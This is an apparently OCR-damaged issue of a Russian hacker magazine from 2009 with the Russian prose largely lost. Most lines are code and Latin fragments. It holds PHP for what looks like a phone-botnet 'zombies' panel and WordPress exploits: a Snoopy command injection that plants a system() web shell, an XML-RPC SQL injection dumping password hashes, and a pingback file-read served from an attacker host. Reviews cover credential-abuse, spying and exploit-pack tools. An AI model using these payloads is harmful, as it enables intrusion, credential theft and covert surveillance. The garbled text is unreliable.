name="alias"/><input type="submit"
value=""></form></div><div id="
showAlias'.$pageView[0].'">'.$pageView[
5].' <a href="javascript:changeAlias('
.$pageView[0].');"></a></div></
td><td><div id="changeComment'.$pageView[0
].'" style="display:none;"><form action=""
method="POST"><input type="hidden"
value=".$pageView[0].'" name="id"/><input
type="text" value="'.$pageView[6].'"
name="comment"/><input type="submit"
value=""></form></div><div id="show
Comment.$pageView[0].'">'.$pageView[6].'
<a href="javascript:changeComment('.$pageVi
ew[0].');"></a></div></td></tr>';
}
echo </table>';
$sqlGetView = "SELECT * FROM zombies";

}
{
}
echo '<table border="1" width="100%"

height="100%">';
echo '<tr><td></td><td>ID</td><td>IMEI</
td><td>Phone number</td><td>Infected Date</
td><td>Last Active Date</td><td>Alias</
td><td>Comment</td></tr>';
echo '<script language="JavaScript">
function changeAlias(id){
document.getElementById
("changeAlias"+id).style.display="";
("showAlias"+id).style.display="none";
}
function changeComment(id){
("changeComment"+id).style.display="";
("showComment"+id).style.display="none";
}
function openZombie(id){
window.location.href="zombie.php?id="+id;
}
</script>';
while ($pageView)
X 05 /125/ 09

.
,
.
,
, .
. , ,
.
. ,
, :). ,
,
, .
, .
. ,
, .
, http://oxod.
ru. ! z
HTTP://WWW
links
www.sqlite.org
SQLite.

.
oxod.ru .
. ,
.
INFO
info

z

Symbian.

.
- .
DVD
dvd

SQLite PHP
.
WARNING
warning
!
! ,

!
059
>>
SPIRIT
/ HTTP://TUTAMC.COM /
>>
.
, . ,
. . , , . .
- , zapisochki.ru,
, , ,
,

! ,
,
,
. .
, ,
. ,
, ,
.
,
zapisochki.ru.
- ,
.

060
. , ,

. ,
,
. , .
AJAX,
. ,
, (board) , URL.
,
. ,
.

- , .
-
HTML- .
. ,
,
,
.
,
. , .
, .

, .
, , ,
.
2.0!

, JavaScript...
!
,
, . ,
X 05 /125/ 09
>>
OFFLINE BROWSER

,
,
.
,
.
,
zapisochki.ru.
JavaScript,
,
.
,
. ,
, ,

,
..
.
, FireFox
:
Temper Data (https://addons.
mozilla.org/en-US/firefox/
addon/966) ,
;
Web Developer (https://addons.
mozilla.org/en-US/firefox/
addon/60) ,
;
FireBug (https://addons.mozilla.
org/en-US/firefox/addon/1843)
X 05 /125/ 09
FIREFOX TEMPER DATA

JavaScript .
Offline Browser (
www.metaproducts.com/mp/Portable_Offline_
Browser.htm ).

:
;
;

;
;
.

zapisochki.ru .
,
, ,
.
, Web
Developer, . Temper Data,
zapisochki.ru, 302 zapisochki.ru/_/,
-
.
zapisochki.ru/_/.
, ,
.
,
URL, .

.
z.
,
z . , ,
,
, .
,
,
,

.
. , ,
,
.
, ,
,
. ,
. .
OFFLINE EXPLORER

.
061
>>
FIREFOX WEBDEVELOPER
HTTP://WWW
links

:
zapisochki.ru.

FireFox:
addons.mozilla.org.
zapisochki.ru/ _,
HTML-
. , ,
, , ,
Offline Browser. URL
zapisochki.ru/_. Next
.
. zapisochki.ru, ,
themes, , .
_,
default.htm.
themes _
, default.htm index.php.
http://z/_, , , .
- .
FIREBUG VS. OFFLINE EXPLORER

FireBug , , Net.
. ,
Console, - dragdrop.
JavaScript, , ,
, !
default.htm dragdrop
:
062
<script
src="../scriptaculous.js@
load=effects,dragdrop"
type="text/javascript"></script>
, scriptaculous.js
@, ? ( Get-).
, Offline Browser,
, .
@ ?,
scriptaculous.js@load=effects,dragdrop
scriptaculous.js. ,
Net FireBug 404,
, , :
effects.js
dragdrop.js
! FireBug ,
.
, , ,
,
. .

!
FireBug , ,
. , X 05 /125/ 09
>>
FIREFOX FIREBUG CONSOLE!
MYSQL FRONT

<table>, . .
Console FireBug . sticker.js.

. ,
,
. , .

, ,
, . ,
.
FireBug Console.
.
.
. , :
Post
board: 700128621751072451716255856
15874
color: 1
id:
text: sometext
x: 123.1
y: 543.2
, board
default.htm, :
var board = '7001286217510724517162
5585615874';
X 05 /125/ 09
,
. , id
,
. -
(,
), ,
id .
, , id ,

.
,
. default.htm,
:
var saveURL = '../noteboard/save/';
, , :
var saveURL = '../save.php';
.
.
, FireBug :
POST /NoteBoard/delete/37094
, id . URL,
, ,
default.htm:
var deleteURL = '../noteboard/
delete/';
,
.htaccess . , URL :
var deleteURL = '../delete.php?';
delete.php, id
GET-.

save.php delete.php, .

. , ,
JavaScript.
.
, board,
,
.
default.
htm, :
<form id="stickers">
<textarea id="s36734"
style="left:61px;top:32px;zindex:1">
1</textarea>
<textarea id="s36735"
style="left:90px;top:33px;zindex:0">
2</textarea>
</form>

textarea,
left top,
z-index , id
. <textarea>
.
,
, AJAX-
JavaScript
.
PHP.
: .htaccess,
index.php, save.php, delete.php. .htaccess

index.php (
,
).
.htaccess :
RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?$1
[L,QSA]
. MySQL
063
>>
DVD
dvd
Offline
Explorer,
zapisochki.ru
PHP-

.
WARNING
warning
,
,
.

:).
FIREFOX FIREBUG CONSOLE!

,
:
id integer,
board bigint, ,

color tinyint,
x float, x-
y float, y-
text varchar(255),
save.php . Post-
:
INSERT INTO z SET 'board'=$board,
'text'='$text', 'x'='$x', 'y'='$y',
'color'='$color'
:
UPDATE z SET 'board'='$board', 'text'='$text',
'x'='$x', 'y'='$y', 'color'='$color' WHERE
'id'='$id'
064
delete.php :
DELETE FROM z WHERE id='$id' AND
board='$board'
index.php, , .
, id, , , ,
Offline Browser, <form>
,
.

, , , .
,
, .
,
.
- ,
http://tutamc.com.
. z
X 05 /125/ 09
>>
0DAY
/ ICQ 884888, HTTP://WAP-CHAT.RU /
WORDPRESS

0DAY

WordPress. ,
penetration- .
, !
>>
,

.

33534
, WordPress,

. :
066
1.5.x 207 (0.6%)

2.0.x 1624 (4.8%)
2.1.x 1219 (3.6%)
2.2.x 2175 (6.4%)
2.3.x 4366 (13%)
2.5.x 4343 (12.9%)
2.6.x 8715 (25.9%)
2.7.x 5986 (17.8%)
Unknown 4899 (14.6%)
,

2.3.x, 2.5.x, 2.6.x, 2.7.x
(2.4.x ).

(,
sql-
2.2.2 ).
X 05 /125/ 09
>>
slugs) )
add_post_meta($post_id,
'_wp_old_slug',
$_POST['wp-old-slug']);
...
}
6. , ,
, ./wp-includes/query.php:
function wp_old_slug_redirect ()
{
...
$query = "SELECT post_id FROM
$wpdb->postmeta, $wpdb->posts WHERE
ID = post_id AND meta_key = '_wp_old_
slug' AND meta_value='" . $wp_query>query_vars['name'] . "'";
WORDPRESS 2.7.1

, , ,

...

, http://lamer/
wp233/2009/03/20/hello-world.
/
,
http://lamer/wp233/2009/03/20/this-is-asucker-post.
! :
:).

2.7.1.
1. wp-comments-post.php (
wp-trackback.php),

:
$commentdata = compact('comment_
post_ID', 'comment_author',
'comment_author_email', 'comment_
author_url', 'comment_content',
'comment_type', 'comment_parent',
'user_ID');
$comment_id = wp_new_comment(
$commentdata );
2. ./
wp-includes/comment.php:
function wp_new_comment
($commentdata)
{
...
$comment_ID =
wp_insert_comment($commentdata);
...
}
3. :
X 05 /125/ 09
function wp_insert_
comment($commentdata)
{
...
if ( $comment_approved == 1)
wp_update_comment_count
($comment_post_ID);
return $id;
}
function wp_update_comment_count
($post_id, $do_deferred=false)
{
...
elseif ( $post_id ) {
return wp_update_comment_count_
now($post_id);
}
}
function wp_update_comment_count_
now($post_id)
{
...
do_action('edit_post', $post_id,
$post);
return true;
}
4. Action edit_post ./wp-includes/

default-filters.php:
add_action('edit_post',
'wp_check_for_changed_slugs');
5. ./wpincludes/post.php:
function wp_check_for_changed_
slugs($post_id) {
if ( !isset($_POST['wp-old-slug'])
|| !strlen($_POST['wp-old-slug']) )
...
// if we haven't added this old slug
before, add it now
if ( !count($old_slugs) || !in_
array($_POST['wp-old-slug'], $old_
...
wp_redirect($link, '301');
// Permanent redirect
exit;
endif;
}

:
_wp_old_slug,

. ,
.

,
:). , -,
:
<html>
<form action="http://lamer.com/
wp/wp-trackback.php?p=[ID_]"
method="post">
: <input name="title"
value="commenter"/><br/>
URL:<input name="url"
value="http://%/la.com"/><br/>
Comment:<input name="excerpt"
value=""/><br/>
Slug:<input name="wp-old-slug"
value=""/><br/>
<input name="blog_name"
value="Blog" /><br/>
<input type="submit" value="ok"/>
</form>
</html>
Slug ,
.
SNOOPY

. , , , WordPress 2.5.x-2.6.x

RSS- Dashboard.
067
>>
PINGBACK-
,
,
. , code exec Snoopy,
. Snoopy
escapeshellcmd 1.5.x , ,
,
2.6.3.
, ,
:
A vulnerability in the Snoopy library was announced
today. WordPress uses Snoopy to fetch the feeds shown
in the Dashboard. Although this seems to be a low risk
vulnerability for WordPress users, we wanted to get an
update out immediately.
Snoopy WordPress <= 2.6.2:

exec(escapeshellcmd($this->curl_path." -D
\"$headerfile\"".$cmdline_params." \"".$safer_
URI."\""),$results,$return);
Snoopy WordPress <= 2.6.5:

exec($this->curl_path." -k -D
\"$headerfile\"".$cmdline_params." \"".escapeshellcmd(
$URI)."\"",$results,$return);
Snoopy,
code exec ( ). ,
? , ?
.

. .
1. RSS-
, ,
, http://lamer.com/code-exec.php;
2. code-exec.php :
<?php
header('set-cookie: `echo \'<?php system($_GET[aa]);
?>\' > ../wp-content/test.php`=cooka');
header("Location: https://chto-ugodno.
com/?feed=rss2");
?>
./wp-content/test.php
. , :
1. WordPress 2.6.3, 2.6.5 (2.6.4 , 2.7 Snoopy
) ,
-;
068
RAZ0R' SNOOPY
2. , curl /usr/local/bin/curl (
FreeBSD), ./wp-includes/class-snoopy.php,
:
if(!$this->curl_path)
return false;
if(function_exists("is_executable"))
if (!is_executable($this->curl_path))
return false;
3. , Snoopy ( 5
). , . , exec() , ,
.
X 05 /125/ 09
>>
HTTP://WWW
PINGBACK- ,

links
SECURITY-
4. ,
. ,
HOST :
<?php
header("Location: https://lal`my evil
command`.com");
?>
UPLOAD
SQL-,
2.2.x-2.3.x.
upload_files ( ,
/). WordPress xmlrpc.php
(-,
SQL- ).
metaWeblog.newMediaObject,
mw_newMediaObject. :
1. ./xmlrpc.php
function mw_newMediaObject($args)
{
...
$blog_ID = (int) $args[0];
$user_login = $wpdb->escape($args[1]);
$user_pass = $wpdb->escape($args[2]);
$data = $args[3];
...
2. ./wp-includes/post.php
function wp_insert_attachment($object,
$file = false, $parent = 0)
{
...
$object = wp_parse_args($object, $defaults);
extract($object, EXTR_SKIP);
...
if ($update) {
$wpdb->query(
"UPDATE $wpdb->posts SET
post_author = '$post_author',
post_date = '$post_date',
post_date_gmt = '$post_date_gmt',
post_content = '$post_content',
post_content_filtered =
'$post_content_filtered',
post_title = '$post_title',
post_excerpt = '$post_excerpt',
post_status = '$post_status',
post_type = '$post_type',
comment_status = '$comment_status',
ping_status = '$ping_status',
post_password = '$post_password',
post_name = '$post_name',
to_ping = '$to_ping',
pinged = '$pinged',
post_modified =
$name = sanitize_file_name( $data['name'] );

$type = $data['type'];
$bits = $data['bits'];
'".current_time('mysql')."',
post_modified_gmt =
'".current_time('mysql',1)."',
post_parent = '$post_parent',
menu_order = '$menu_order',
post_mime_type = '$post_mime_type',
guid = '$guid'
WHERE ID = $post_ID");
...
$attachment = array(
'post_title' => $name,
'post_content' => '',
'post_type' => 'attachment',
'post_parent' => $post_id,
'post_mime_type' => $type,
'guid' => $upload[ 'url' ]
);
// Save the data
$id = wp_insert_attachment( $attachment,
$upload[ 'file' ], $post_id );
...
}
X 05 /125/ 09
}
...
}
secunia.com/
Advisories/32361
advisory
Snoopy.
core.trac.wordpress.
org
.
wordpress.org/
download

WordPress.
wordpress.org/
development/2008/10/
wordpress-263
, 2.6.3
WordPress.
withdk.com/archives
/Libcurl_arbitrary_
file_access.pdf
curl.
INFO
info
Raz0r
code
exec
WordPress 2.6.x, Elekt .
$type, ,

SQL- :).
UPDATE-, , POST-
xmlrpc.php:
<?xml version="1.0" encoding="UTF-7"?><methodCall>
<methodName>wp.uploadFile</methodName>
069
>>
SQL- XMLRPC.PHP
CHANGESET SNOOPY
<params>
<param><value><string>1</string></
value></param>
<param><value><string>[_]</string></value></param>
<param><value><string>[_]</string></value></param>
<param><struct>
<member>
<name>name</name>
<value>xxx.gif</value>
</member>
<member>
<name>type</name>
<value>gif',(select concat(user_
login,':',user_pass) from wp_users
limit 1))/*</value>
</member>
<member>
<name>bits</name>
<value>HELLO WORLD!</value>
</member>
</struct>
</param>
<param><value><string>77</
string></value></param>
</params></methodCall>
: Manage => Uploads.

URL
.

WordPress (
),
070

.
, 2.7.
, , , , curl, php-
WordPress
Snoopy. ,
,
http,
file://! , ,
, , file:// .
, curl
CURLOPT_
FOLLOWLOCATION. ,
http,

( advisory )!
./wp-includes/
http.php,
pre-auth
(
:)).

(2.7.1):
1. ./wp-includes/http.php
class WP_Http_Curl {
function request($url,
$args = array()) {
if ( !ini_get('safe_mode')
&& !ini_get('open_basedir') )
curl_setopt( $handle,
CURLOPT_FOLLOWLOCATION,
true );
-! ,
!
, ,
(
) http-
:
function wp_remote_get($url, $args
= array()) {
$objFetchSite =
_wp_http_get_object();
return $objFetchSite->get($url,
$args);
}
2. , ,
./wp-includes/functions.php:
function wp_remote_fopen( $uri ) {
...
$response = wp_remote_get( $uri,
$options );
...
}
3. , ,
xmlrpc:
function pingback_ping($args) {
...
$pagelinkedfrom = $args[0];
$pagelinkedto
...
= $args[1];
X 05 /125/ 09
>>
c:\
boot.ini .
POST-
xmlrpc:
<methodCall>
<methodName>pingback.ping</
methodName>
<params>
<param><value><string>http://
lamer.com/ping1/?p=2</string></
value></param>
<param><value><string>http://
lamer.com/ping2/?p=[____]#lamer.com/
blog</string></value></param>
</params>
</methodCall>

:
1. c:\boot.ini ,

Pingback from http://lamer.com/
ping1/?p=2 to http://lamer.
com/ping2/?p=1#lamer.com/blog
registered. Keep the web talking!
:-)
WP_OLD_SLUG,
2. ,
The source URL does not exist.
// Let's check the remote site

$linea = wp_remote_fopen
($pagelinkedfrom);
...
, .
?
,
, .
, http. , : http://lamer.
com/ping1/index.php http://lamer.com/ping2/
index.php.
, lamer.
com/blog , :
1. ./ping1/index.php
<?php
header("<title>Exploit</
title><a href="http://lamer.com/
ping2/?p=1#lamer.com/blog">Curl</
a>");
header("Location: file:///c:\boot.
X 04 /124/ 09
ini", 302);
?>
2. ./ping2/index.php
<a href="http://lamer.com/
ping1/?p=2">Ping2</a>
,
. xmlrpc.
php:
// Check if the page linked to is in
our site
$pos1 = strpos($pagelinkedto,
str_replace(array('http://
www.','http://','https://
www.','https://'), '', get_
option('home')));
if( !$pos1 )
return new IXR_Error(0, __
('Is there no link to us?'));
,
, ,
. ,
URL .
,
,
. , - -
:
[...] Server: Apache/2.2.4 (Win32)
mod_ssl/2.2.4 OpenSSL/0.9.8d
PHP/5.2.4 X-Powered-By: PHP/5.2.4
popa: 111 Location: file:///c:boot.
ini Content-Length: 0 Connection:
close Content-Type: text/html; [...]
c:\boot.ini -
:).
.
wp_get_http(),
.
.
TO BE CONTINUED...
, WordPress ?
: WordPress
codebase. ,
... :)! z
071
>>
R0ID
/ R0ID@BK.RU /
>>

:FTP-TOOLZ
: *NIX/WIN
:JEN
(PR/)

hostname
:
FTP- :)
ftp-
.
.
FTP-Toolz.
-, PHP.
,
:
-
ftp-
(
/ )
iframe-
run-time

(
, ,
,
)
ftp-
( )
/

,
stop
, ,
-
:

Google PageRank (PR)

-
072
ftp://login:pass@server
login:pass@server

.
( :)) ,
./
ftp_tools/upload, mysql_config.php:
<?php
$db_host = "localhost";
#
$db_user = "root"; #
$db_passwd = "root"; #
$db_name = "ftps"; #
?>

http://_/
ftp_tools/install.php.
, GeoIP ./ftp_tools/seller_tool/GeoIP.
dat. PHP => 4.0.3
Safe_Mode,
MySQL .
: MICSPY
: WINDOWS 2000/XP
: SLESH
? ,
,
! ,
.
,
, :). MicSpy
SLESH'.
-,
.

, ,
MicSpy by SLESH
, .

(, ,
).
7 . :
-
.mp3, 24 32/,
MPEG LAYER-3

: ___
--.mp3
, 4545
.
:
/

, ..

P.S. :
MicSpy.dpr ,

API.pas ,
MicRec.pas
C,
.

( :)). SLESH' .
X 05 /125/ 09
>>
//
$TableCache
= "cache";
//
?>
: WEB SECURITY SYSTEM

: *NIX/WIN
: AVADANEI ANDREI

, .

Web Security System XSS, SQL-injection, RFI-.
, !
(,
:)). :
PHP-

:
IP-

IP-
,
:
$_GET
$_POST
$_SERVER
$_SESSION
$_COOKIE
$_SERVER :
"HTTP_ACCEPT", "HTTP_ACCEPT_
CHARSET", "HTTP_ACCEPT_ENCODING",
"HTTP_ACCEPT_LANGUAGE", "HTTP_
CONNECTION", "HTTP_HOST", "HTTP_
REFERER", HTTP_USER_AGENT",
"SERVER_ADMIN", "SERVER_PORT",
"SERVER_SIGNATURE", "PHP_AUTH_
DIGEST", "PHP_AUTH_USER", "PHP_
AUTH_PW", "AUTH_TYPE".
,
config.php,
prt_system.php,

:
RunPSystem()

SetScanZone($which,$value)
SetNoneProtection()
(1 )
SetAllProtection()
7
SetWarningLevel([$level])
SetMessageToAttacker([$show],[$me
X 05 /125/ 09
WSS
ssage])
SetPatchVars([$value])
private $ProtectionLevel = 7;
// Protection level
private $WarningLevel
= 3;
// Warning level
private $MysqlID
= -1;
// Mysql Connection ID
private $ShowMessage
= TRUE;
// If we detect something we show an
message
private $EventMessage
= "Acces
Violation!";
// Message show
in case of attack detection
private $PatchVars
=
TRUE;
// Patch value
from detected problems
private $FollowAttacker = TRUE;
// Store all information about
attacker from now on
private $ExistThreads
= FALSE;
// Security Threads
private $SecurityThreads =
array(array(array()));
// Store
threads if exists
private $SystemVersion
= "1.4";
// System Version
private $SystemUpdateLink = "";
// Hold update link
private $SystemUpdateVers = "";
// Hold update version
private $ExceptionVars
=
array();
// Hold
special checks vars
config.php
:
<?php
$user = "Andrei"; //
$pass = "wss"; //
//
$connection = array("server" =>
"localhost",
"user"
=> "root",
"pass"
=> "",
"database" => "wss");
//WARNING !! if you edit settings
bellow you must edit settings from
the prt_system.php file..
$TablePrefix
= "prt_sys_";
//
$TableMain
= "main";
//
$TableAttackers = "attackers";
. ,
.
: UNIQUE PACK V.1.1

: *NIX/WIN
Unique Pack
, .
Unique Pack v.1.1.
,

. :
PDF- (
, PDF )
PDF- ( Double PDF
)

:

exe'
1.exe

config.php , pdf.
php load.php,
/
http://
_/spl/_install.php
"Installation
finished Please delete install.php"
_install.php
:
http://_/spl/admcp.php
:
http://_/spl/index.php
P.S. ,
,
. z
073
>>
E-Go
ld
E-Gold
MIFRILL
/ MIFRILL@RIDDICK.RU /

E-Gold
WebMoney, PayPal, ., Moneybookers , , .
. , ,
.
E-Gold. . , , ?

E-Gold

, .

1996 ,
(Douglas
Jackson) (Barry K. Downey).
E-Gold ( ) -,
.

, ,

( ). Florida
Oncology.
074
, ,
,
.
. ,
, ,
,
. ,
. 1995-

,
.

.
, ,

,
. E-Gold
1996- ,
.
.
1998-

Gold & Silver Reserve (G&SR) Inc.
Florida Oncology

.
G&SR
,
. ,
,
, ,
, .
E-Gold.
X 05 /125/ 09
>>

,
XXI .
.

, E-Gold
.
, , ,
.

( 2.5 !),
,
,
. ,
E-Gold ,
(XAU) (AUG).

.
,

E-Gold Ltd. (

E-Gold Ltd.,
-).

,
,

. ,
, , , ,
.

, ,
- ..
,

X 05 /125/ 09
.
:
,
, , ,

.
, . ,
,
, E-Gold.
.

( 2003
),
, , .
, E-Gold

. , , ,

, .

. ,
, (
) . , E-Gold ,
, . ,
,
,

, ,
. , E-Gold

.
,
, ,
, , -
, .
,
.
, , ,
E-Gold
, 9 2001 . -
,
, ,
. ,

, ,
, . , , ,
,
,
,
,
.
, E-Gold
. , ,

.
,

.
, ,
2000-, .
,

. E-Gold . .
075
>>
E-GOLD,

E-Gold 2004-2005
. ,
.
, , ,
,
;
,
,
;
( , ).

, 2005- .
Gold&Silver Reserve,
Inc. ,
.
,
. ,
. 2006- ,
E-Gold.
, ,
, ,
E-Gold

. ,

.
, E-Gold . ,
IT-
, E-Gold.
, BusinessWeek ,

ShadowCrew ,
$40.000 $100.000 . ,

,
2006-,
076
,
E-Gold

.
10 (
$200.000). ,
5, 15 .
, -, ,
,
,
E-Gold, ,
. ,

PayPal.

,
E-Gold
, ,
,
, .
, E-Gold -
-
, ,
-.
.
eBay, 2006
PayPal
.
E-Gold , eBay
. ,
E-Gold (,
E-Gold).
, -
E-Gold
,
X 05 /125/ 09
>>
E-GOLD,

E-Gold 2004-2005
. ,
.
, , ,
,
;
,
,
;
( , ).

, 2005- .
Gold&Silver Reserve,
Inc. ,
.
,
. ,
. 2006- ,
E-Gold.
, ,
, ,
E-Gold

. ,

.
, E-Gold . ,
IT-
, E-Gold.
, BusinessWeek ,

ShadowCrew ,
$40.000 $100.000 . ,

,
2006-,
076
, E-GOLD
.
10 (
$200.000). ,
5, 15 .
, -, ,
,
,
E-Gold, ,
. ,

PayPal.

,
E-Gold
, ,
,
, .
, E-Gold -
-
, ,
-.
.
eBay, 2006
PayPal
.
E-Gold , eBay
. ,
E-Gold (,
E-Gold).
, -
E-Gold
,
X 05 /125/ 09
E-Go >>
ld
E-Gold
E-GOLD.COM
.
:

;

.

E-Gold, .
, ,
.

E-Gold , 2007
G&SR . ,
,
. , ,

95 . EGold -
, 3.5
,
. 2008-
2.420 .
, 2008 , , E-Gold
. ,

, 2008
. ,

3 (
), 300 . :
X 05 /125/ 09
$200
( ),
$2.500 .

.
, Gold & Silver Reserve

, .
, ,
. ,
,
, E-Gold, ,
,
, ,
.
, ,

,
.
,
. ,
.
, , , ,
.
2008- DDoS- E-Gold,
, , , E-Gold
. -
(,
, ) ,
, ,
.
E-Gold .
E-Gold, ,
,
,
70% .
E-Gold , . ,
.
, , ,
E-Gold,
. , .

- . ,
.
,

90- .
, E-Gold
13-
, , . ,

,
, ,
, , -,
.z
077
>> unixoid
AT91SAM9260
ALTERA
Ethernet
NAMD 256 M
J1M
/ ZOBNIN@GMAIL.COM /
Ethernet
AT91SAM9260

GNU / Linux
>> unixoid
Linux -, IBM PC. ,

,
- . ,
-.
,
Linux !
KORSET HIDS
, ,

.
.
, .

, , ,

, .
, ,
Datasheet
.
, ,

Linux , ,
, . ,
- , -
078
:
,
, .
, ,
Linux
, .
. ,
, :).

sh27cnc1,
Atmel
AT91SAM9260-EK
( ) Altera,
.
:
Atmel AT91SAM9260
PQFP
: 64 SDRAM
( 32 16
)
NAND-Flash: 256
DataFlash SPI- Atmel
AT45DB041B: 1

Ethernet, IEEE 802.3:
Micrel KSZ8041TL
USB-
DBGU-
, AT91SAM9260
,
.
,
(EMAC
Ethernet) Flash-. 9260 , , -. ,
8 ,
4,
.
X 05 /125/ 09
>> unixoid
AT91SAM9260
32 MB SDRAM
PHY ->
ALTERA
32 MB SDRAM
DBGU
USB
Ethernet
NAMD 256 M
USB-A

.
,
? , , . ROM
.
, 4 ( )
Data- NAND-flash ,

( 4 ) . 4
SDRAM,
Flash-,

. , .
, (
Coding),
( ).

DBGU. ,
UART- .
X 05 /125/ 09
RS-232- 9- COM-,
.
,
:
: 115200
: 8 bits
:
-: 1
:

PC.
.

,
,

. .
, AT91SAM9,
Data- NAND- ,
ROM SAM Boot

Agent (SAM-BA). -
(
) SPI Slave
Output .
USB- , :
$ lsusb
Bus 002 Device 060: ID 03eb:
6124 Atmel Corp. at91sam SAMBA
bootloader
, www.linux4sam.org/twiki/
bin/view/Linux4SAM/SoftwareTools,
.
:
# modprobe usbserial vendor=0x03eb
product=0x6124
, COM-, -.
samba_cdc_2.8.linux_01, . /dev/ttyUSB0
079
>> unixoid

AT91SAM9260-EK. ,
, . Enable Flash
Execute,
.
4-
Send Boot File,

. , ,
(0x10000
NAND). ,
arm-elf-gcc ARM.
gnuarm.com.
.

, AT91 BOOTSTRAP
www.linux4sam.org/tw
iki/bin/view/Linux4SAM/AT91Bootstrap.
Dataflash Chip Select
1,
, .
.
,
Makefile. 8- Dataflash , ,
256- NAND-Flash.
,
:
$ cd board / at91sam9260ek / dataflash
$ make CROSS_COMPILE=arm-elf -
,
, , 4096 .
Dataflash- AT45DB041B
driver/dataflash.c. df_init

. ,
.
080
U-BOOT
,

, #undef CFG_
DEBUG at91sam9260ek.h.

, , - ,
.
.bin
Flash SAM-BA Boot,
Send Boot File. , .

, U-BOOT
. .
,
(TFTP BOOTP),
RAM Flash . ,
. ,
u-boot1.3.4.tar. bz2, ,
u-boot1.3.4-exp.diff :
$ make at91sam9260ek_dataflash_cs0_
config
$ make CROSS_COMPILE=arm-elf -
, u-boot.bin.

(4- Bootstrap), :
$ less at91sam9260ek. h
#define IMG_ADDRESS 0x8400 / * Image
Address in DataFlash * /
#define IMG_SIZE 0x33900 / * Image
Size in DataFlash * /
#define JUMP_ADDR 0x23F00000 / *
Final Jump Address * /
, Bootstrap
( , U-Boot)
. ,
Dataflash 0x8400. Environment, , , , - .

U-Boot 0x4200 ( /
include/configs/at91sam9g20ek.h),
,
.
. U-boot
, . help .
LINUX
U-Boot,
.
? www.linux4sam.org
/twiki/bin/view/Linux4SAM/LinuxKernel
,
. , .
NAND-Flash 0x42000. ,
;
,
.
, (2.6.27),
, SAM-BA Boot, .

U-Boot. :
U-Boot> setenv bootcmd nboot
0x22000000 0x0 0x42000 \ ; bootm
U-Boot> saveenv
setenv .
Bootcmd ,
( nboot
0x22000000 0x0 0x42000; bootm),
3- U-Boot. nboot
NAND-Flash
, bootm , mkimage ( ).
X 05 /125/ 09
>> unixoid
EMDEBIAN
,
, boot.
, , ,
( Uncompressing Linux).
, . ,

. .
,
, ,
! . , .
, ,
. , linux4sam.org
.
, ,
(
).

$ cd linux2.6.27 /
$ wget maxim.org.za / AT91RM9200 / 2.6 / 2.6.27-at
91.patch. gz
$ zcat 2.6.xx-at91.patch. gz | patch -p1

$ wget www.linux4sam.org / twiki / pub /Linux4SAM
/ LinuxKernel / at91sam926yek_defconfig
$ cd linux2.6.27 /
$ cp at91sam926yek_defconfig.config
$ make ARCH=arm oldconfig
$ make ARCH=arm menuconfig
$ make ARCH=arm CROSS_COMPILE=arm-elf

U-Boot :
$ mkimage -A arm -O linux -C none -T kernel \
-a 20008000 -e 20008000 -n linux2.6 \
-d arch / arm / boot /zImage uImage
'-a' , , '-e' . ,
, U-Boot (0x2200_0000).

, Linux,
Flash-,
X 05 /125/ 09

SAM-BA BOOT
.
, ,
IBM- ,
. Evaluation Kit,
, Linux
( linux2.6.27/arch/arm/mach-at91/board-sam9260ek.
c)!
. ,
0x400000 (/dev/mtdblock1). linux4sam.org.
OpenEmbedded/Angstrom BuildRoot
uClibc. ,
jffs2- .
, bootargs
u-boot, :
U-Boot> setenv bootargs root= / dev / mtdblock1
rootfstype=jffs2 rw
U-Boot> saveenv
, ,
. root, .
, ! , ,
:). , .
EMDEBIAN (EMDEBIAN.ORG)
, ,
Debian
,
.
, Emdebian .
Grip Crush, Debian GNU/Linux
5.0 Lenny. Grip,
coreutils glibc. .
Emdebian
debootstrap emdebian-tools. , .
, apt-cache
HTTP://WWW
links

91SAM:
linux4sam.org.
U-boot:
www.denx.de/wiki/UBoot.
:
electronix.ru.
DVD
dvd

U-Boot ,
OpenEmbedded/
Angstrom BuildRoot,
.
081
>> unixoid
DBGU
search emdebian, .
: packages.conf
:
SCRIPT=/usr/share/debootstrap/script
s/lenny
MIRROR=http://www.emdebian.org/grip/
PROXY=http://www.emdebian.org/grip/
SUITE=stable
emsandbox:
emsandbox -a arm -v./ -m./ --machine-path .

. .
,
, ,
(x86),
082
. ,
emsecondstage,
.
.
usb- ,
.
chroot , /var/cach
e/apt/archives, libc6 sysvinit,
Debian.
?
, .

, ,
! ,
, ,
HID-
, .

U-Boot. - , , ,
4- AT91 Bootstrap

.
USB-
. 400- , . -,
http-
,
. , , , . z
X 05 /125/ 09
OPENBSD 4.5
>> unixoid
NETBSD 5.0
J1M
OPENBSD 4.5
OPENBSD 4.5
/ ZOBNIN@GMAIL.COM/
BSD
OPENBSD 4.5
NETBSD
OPENBSD 4.5
OpenBSD 4.5 NetBSD 5.0
>> unixoid
UNIX- Linux FreeBSD ,

, . Open/NetBSD
, ,
.
OPENBSD.

OpenBSD Theo de Raadt , NetBSD

1995

. OpenBSD
, ,
, - : .
OpenBSD

, .
, ID .
.
,
084
, , .
,
OpenSSH

pf,
BSD.

OpenBSD. BSD
, ,
, .
OpenBSD
CVS,
NTP, SNMP,
OSPF, BGP, 4.5 SMTP.

GNU binutils.

,
NetBSD
FreeBSD.
OpenBSD
,
.

2008
OpenBSD 4.4. OpenSSH 5.1,
OpenCVS,
sysmerge tcpbench,

(
WPA / WPA2 )
. ? , smtpd, , ,
SMTP-,
sendmail,

. X 05 /125/ 09
>> unixoid

BSD
pf- :

smtpd
listen on localhost port 25
hostname localhost
accept for domain "localhost"
deliver to mbox " / var / mail / %u"
accept from $local for all relay
,
95 % .
4.5 OpenSSH 5.2,
:
'-y' syslog stderr,
.
ForceCommand
sftp-.
sshd PermitEmptyPasswords
AllowAgentForwarding, Match.

0 ( ).
SOCKS4A , , , , ~C.
, OpenSSH 5.2
.
bluetooth NetBSD alpha, amd64,
armish, hppa, i386, landisk, macppc, sparc64 zaurus. btd (8), btctl (8)
bt.conf (5) bluetooth-.
802.11x PMKSA ,
BIP (Broadcast / Multicast Integrity
Protocol) 802.11w.
MSDU MMPDU . ipw (4)
iwi (4) WPA. chan, ifconfig (8),
X 05 /125/ 09
PF.CONF
PFLOW
, scan .
/dev/drum /dev/prandom.
ARM9e
ARM. DRM- inteldrm radeondrm,
, .
.
: gumstix OpenMoko,
,
. pflow
(4), IP- UDP
NetFlow 5 . pflow, :
# ifconfig pflow0 create
# ifconfig pflow0 flowsrc 192.168.1.2 flowdst
192.168.1.1:1234
ICMP-,
:
host1# vi / etc / pf. conf
